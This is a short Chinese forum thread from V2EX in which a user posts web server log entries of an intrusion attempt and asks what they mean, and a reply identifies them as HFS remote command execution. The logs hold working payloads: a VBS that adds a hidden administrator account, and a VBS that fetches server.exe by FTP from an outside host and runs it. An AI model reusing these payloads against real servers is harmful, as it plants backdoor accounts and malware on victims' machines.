V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
feast
V2EX  ›  程序员

套路云等了一个多月,终于来一个小学生,大佬看看代码什么意思

  •  
  •   feast · 2017-11-23 15:17:55 +08:00 · 3897 次点击
    这是一个创建于 2556 天前的主题,其中的信息可能已经有所发展或是发生改变。

    小学生还挺厉害的,成功注入 <script src="&lt;a href=" https:="" <a="" href="http://gist.github.com" rel="nofollow">gist.github.com="" anonymous="" 876061f144c87428a0552e8da23d36a4"="" rel="nofollow">https://gist.github.com/anonymous/876061f144c87428a0552e8da23d36a4"></script>

    4 条回复    2017-11-23 18:21:30 +08:00
    feast
        1
    feast  
    OP
       2017-11-23 15:18:41 +08:00
    shit,怎么不正常,干脆直接贴
    10:21:58 222.186.57.27:1682 请求 GET /?search={.save|1.vbs|a=replace("Set*o=CreateObject(""Shell.Users""):Set*z=o.create(""IDC_witkey""):z.changePassword*""zxc123..."","""":z.setting(""AccountType"")=3","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
    10:22:46 222.186.57.27:2013 请求 GET /?search={.save|cmd.vbs|a=replace("set*objShell=wscript.createObject(""wscript.shell""):objShell.Run(""cmd.exe*/c*echo*open*d.lengyue.win*>1.txt*&&*echo*123*>>1.txt*&&*echo*123*>>1.txt*&&*echo*get*server.exe*>>1.txt*&&*echo*bye*>>1.txt*&&*ftp*-s:1.txt*&&*server.exe""):wscript.quit","*",Chr(32)):Execute(a).
    nyanyh
        2
    nyanyh  
       2017-11-23 16:01:26 +08:00
    有这时间干点啥不好非要分析入侵日志
    之前我在 vps 上跑了个 flask 接收我写的一个小程序上传的数据,有几个无聊 IP 不停地往那个端口发各种数据,刚开始还想分析分析到底发了什么,现在 log 都几百 M 了,一点看得兴趣都没有了……
    sola97
        3
    sola97  
       2017-11-23 18:05:53 +08:00 via Android
    不知道那个 server.exe 是干啥的
    jimmy2010
        4
    jimmy2010  
       2017-11-23 18:21:30 +08:00 via Android   ❤️ 1
    hfs 远程命令命令执行
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   931 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 20:37 · PVG 04:37 · LAX 12:37 · JFK 15:37
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.